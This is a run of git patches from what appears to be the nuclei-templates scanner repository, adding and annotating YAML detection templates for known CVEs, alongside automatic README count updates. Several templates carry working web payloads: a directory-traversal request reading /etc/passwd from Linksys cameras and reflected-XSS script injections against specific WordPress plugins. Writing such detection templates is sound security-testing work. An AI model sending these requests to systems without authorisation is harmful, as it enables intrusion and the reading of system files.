NVMS 1000 - Directory Traversal author: daffainfo severity: high reference: | From 829507fd1e8cb18d06b9e9619aacaf69db1b1169 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:58:51 +0530 Subject: [PATCH 077/132] Update CVE-2019-20085.yaml --- cves/2019/CVE-2019-20085.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 8d5916a7ae..1c31973d6b 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -4,10 +4,11 @@ info: name: TVT NVMS 1000 - Directory Traversal author: daffainfo severity: high + description: TVT NVMS-1000 devices allow GET /.. Directory Traversal reference: | - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 - https://www.exploit-db.com/exploits/48311 - tags: cve,cve2019,iot + tags: cve,cve2019,iot,lfi requests: - method: GET From 63ce91ad492df5a8cacff65d0a14f7c9e2f46cb7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:30:07 +0000 Subject: [PATCH 078/132] Auto Update README [Fri Jul 16 12:30:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cb2a5b5166..7ea0b271ae 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 444 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 445 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1569 files**. +**128 directories, 1570 files**. From ba827f37c016c214440d62554fc0e234cd58a947 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:30:42 +0000 Subject: [PATCH 079/132] Auto Update README [Fri Jul 16 12:30:42 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7ea0b271ae..a1b212b721 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 445 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 446 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1570 files**. +**128 directories, 1571 files**. From 0efece2e2b32c2eac5f1fc884c303adb95e30529 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:35:28 +0000 Subject: [PATCH 080/132] Auto Update README [Fri Jul 16 12:35:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a1b212b721..09ff3b9208 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 446 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 449 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1571 files**. +**128 directories, 1575 files**. From 141993dafd28434188a14f5c4ebcac79d17e95d3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:40:24 +0700 Subject: [PATCH 081/132] Create CVE-2009-1558.yaml --- cves/2009/CVE-2009-1558.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2009/CVE-2009-1558.yaml diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml new file mode 100644 index 0000000000..f5f348890c --- /dev/null +++ b/cves/2009/CVE-2009-1558.yaml @@ -0,0 +1,23 @@ +id: CVE-2009-1558 + +info: + name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal + author: daffainfo + severity: high + reference: https://www.exploit-db.com/exploits/32954 + tags: cve,cve2009,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 3830a7805a11097ac4586969156a178466028c6c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:49:06 +0700 Subject: [PATCH 082/132] Create CVE-2016-1000128.yaml --- cves/2016/CVE-2016-1000128.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000128.yaml diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml new file mode 100644 index 0000000000..83fc34ed8d --- /dev/null +++ b/cves/2016/CVE-2016-1000128.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000128 + +info: + name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6ee439eda2b02d2ae7393198c15ac0b8c81e568c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:50:57 +0700 Subject: [PATCH 083/132] Create CVE-2016-1000129.yaml --- cves/2016/CVE-2016-1000129.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000129.yaml diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml new file mode 100644 index 0000000000..72991376fc --- /dev/null +++ b/cves/2016/CVE-2016-1000129.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000129 + +info: + name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 63d2932eac116aab9f2909949c91c3c4576d3682 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:52:56 +0700 Subject: [PATCH 084/132] Create CVE-2016-1000130.yaml --- cves/2016/CVE-2016-1000130.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000130.yaml diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml new file mode 100644 index 0000000000..f3fcc33305 --- /dev/null +++ b/cves/2016/CVE-2016-1000130.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000130 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4886bc48fd0258cecb34eef62a68c06ba1297a34 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:55:47 +0700 Subject: [PATCH 085/132] Create CVE-2016-1000131.yaml --- cves/2016/CVE-2016-1000131.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000131.yaml diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml new file mode 100644 index 0000000000..1e540169b2 --- /dev/null +++ b/cves/2016/CVE-2016-1000131.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000131 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From e848640e9d213064ae2cec01e38434edac4ee144 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 16 Jul 2021 23:27:01 +0530 Subject: [PATCH 086/132] Added CVE-2019-12616 --- cves/2019/CVE-2019-12616.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-12616.yaml diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml new file mode 100644 index 0000000000..093014e337 --- /dev/null +++ b/cves/2019/CVE-2019-12616.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-12616 + +info: + name: phpMyAdmin CSRF + author: Mohammedsaneem + description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. + severity: medium + tags: cve,cve2019,phpmyadmin,csrf + reference: | + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/" + + matchers-condition: and + matchers: + - type: word + words: + - "4.6.6deb4+deb9u2" + - "phpMyAdmin" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 0eb5990c06ef5e6f6aa7a0c5fcb85d3902fc7ac3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 17:59:09 +0000 Subject: [PATCH 087/132] Auto Update README [Fri Jul 16 17:59:09 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 09ff3b9208..7ee95f4c1c 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 449 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 450 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1575 files**. +**128 directories, 1576 files**. From e6cdaee59fdedfbb041e11a62edd81b8596c4ff8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:01:11 +0700 Subject: [PATCH 088/132] Create CVE-2016-1000132.yaml --- cves/2016/CVE-2016-1000132.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000132.yaml diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml new file mode 100644 index 0000000000..af30f2ca54 --- /dev/null +++ b/cves/2016/CVE-2016-1000132.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000132 + +info: + name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 977b588c3c95dd882a96a61432980e5a55921240 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:06:22 +0700 Subject: [PATCH 089/132] Create CVE-2016-1000133.yaml --- cves/2016/CVE-2016-1000133.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000133.yaml diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml new file mode 100644 index 0000000000..9a682352a7 --- /dev/null +++ b/cves/2016/CVE-2016-1000133.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000133 + +info: + name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 89cd375576fd0057d20a76b140911860acc73d31 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:07:53 +0700 Subject: [PATCH 090/132] Create CVE-2016-1000134.yaml --- cves/2016/CVE-2016-1000134.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000134.yaml diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml new file mode 100644 index 0000000000..0a7af624f3 --- /dev/null +++ b/cves/2016/CVE-2016-1000134.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000134 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 3fee8f6145b45ca01f52f9dcd0408f259e6a5898 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:09:08 +0700 Subject: [PATCH 091/132] Create CVE-2016-1000135.yaml --- cves/2016/CVE-2016-1000135.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000135.yaml diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml new file mode 100644 index 0000000000..f7703f0121 --- /dev/null +++ b/cves/2016/CVE-2016-1000135.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000135 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 048cdff2257fb687bc32bb1f950dbe3c9793ba69 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 02:07:26 +0530 Subject: [PATCH 092/132] Additional matcher --- cves/2020/CVE-2020-12054.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index e937c8a86e..11b19bcd64 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -18,7 +18,9 @@ requests: - type: word words: - "" + - "catch-breadcrumb" part: body + condition: and - type: word part: header From dd16d1349a05e4508c5192d7098b9d4eeedfe778 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:02:09 +0530 Subject: [PATCH 093/132] Update CVE-2009-1558.yaml --- cves/2009/CVE-2009-1558.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml index f5f348890c..f56848b401 100644 --- a/cves/2009/CVE-2009-1558.yaml +++ b/cves/2009/CVE-2009-1558.yaml @@ -4,6 +4,7 @@ info: name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal author: daffainfo severity: high + description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. reference: https://www.exploit-db.com/exploits/32954 tags: cve,cve2009,iot,lfi From 468cc383f416f2b2d0bbedd35e036183d48b5f16 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:35:07 +0000 Subject: [PATCH 094/132] Auto Update README [Sat Jul 17 04:35:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7ee95f4c1c..4506f054c5 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 450 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 452 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1576 files**. +**128 directories, 1578 files**. From 146085a0b8f1937a7927f91cdab9257e16a36ecc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:05:56 +0530 Subject: [PATCH 095/132] Update CVE-2016-1000129.yaml --- cves/2016/CVE-2016-1000129.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index 72991376fc..d76c910dcf 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -4,6 +4,7 @@ info: name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 tags: cve,cve2016,wordpress,xss,wp-plugin From f503adee9754fabc0b256233577b06fd5694961d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:07:03 +0530 Subject: [PATCH 096/132] Update CVE-2016-1000130.yaml --- cves/2016/CVE-2016-1000130.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index f3fcc33305..36392e35d4 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml @@ -4,6 +4,7 @@ info: name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin e-search v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 tags: cve,cve2016,wordpress,xss,wp-plugin From 993317658932cde23a71aca4a0a66b151ba81c31 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:37:31 +0000 Subject: [PATCH 097/132] Auto Update README [Sat Jul 17 04:37:31 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4506f054c5..8c3a31b76f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 452 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 453 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1578 files**. +**128 directories, 1579 files**. From ccff761a30eacffb38821b0a37a5fdc0bcde0bfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:38:54 +0000 Subject: [PATCH 098/132] Auto Update README [Sat Jul 17 04:38:54 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8c3a31b76f..97b2c25465 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 453 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 454 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1579 files**. +**128 directories, 1580 files**. From 9e13ac967e526044e116a57e6c229ff73886f7e8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:40:28 +0000 Subject: [PATCH 099/132] Auto Update README [Sat Jul 17 04:40:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 97b2c25465..b74d85e047 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 454 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 455 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1580 files**. +**128 directories, 1581 files**. From 2e1222e8657e7a937ed30a386c2a0da6fe385225 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:10:50 +0530 Subject: [PATCH 100/132] Update CVE-2016-1000132.yaml --- cves/2016/CVE-2016-1000132.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index af30f2ca54..e72ea63c7b 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml @@ -4,6 +4,7 @@ info: name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 tags: cve,cve2016,wordpress,xss,wp-plugin From 2a272f810c26ca5bc3905aa79eb289de3bed023c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:45:51 +0000 Subject: [PATCH 101/132] Auto Update README [Sat Jul 17 04:45:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b74d85e047..bcf6565570 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 455 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 456 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1581 files**. +**128 directories, 1582 files**. From 0996d4cf5f31313b95a1c5bf8f493d28f90c537f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:16:20 +0530 Subject: [PATCH 102/132] Update CVE-2016-1000133.yaml --- cves/2016/CVE-2016-1000133.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 9a682352a7..658b8562e7 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -4,6 +4,7 @@ info: name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 tags: cve,cve2016,wordpress,xss,wp-plugin From 6a45c29d460fc52241f766b64835634ce5196206 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 17 Jul 2021 10:18:09 +0530 Subject: [PATCH 103/132] Update CVE-2016-1000134.yaml --- cves/2016/CVE-2016-1000134.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index 0a7af624f3..1f35214f3d 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml @@ -4,6 +4,7 @@ info: name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 tags: cve,cve2016,wordpress,xss,wp-plugin From 72cc2adedc84375de2868c6b0972e8241cef5960 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 04:48:40 +0000 Subject: [PATCH 104/132] Auto Update README [Sat Jul 17 04:48:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bcf6565570..8f529b5222 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 456 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 457 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1582 files**. +**128 directories, 1583 files**. From 7d5e27f3d7d6eec02e0712ebef049e62d12eeab7 Mon Sep 17 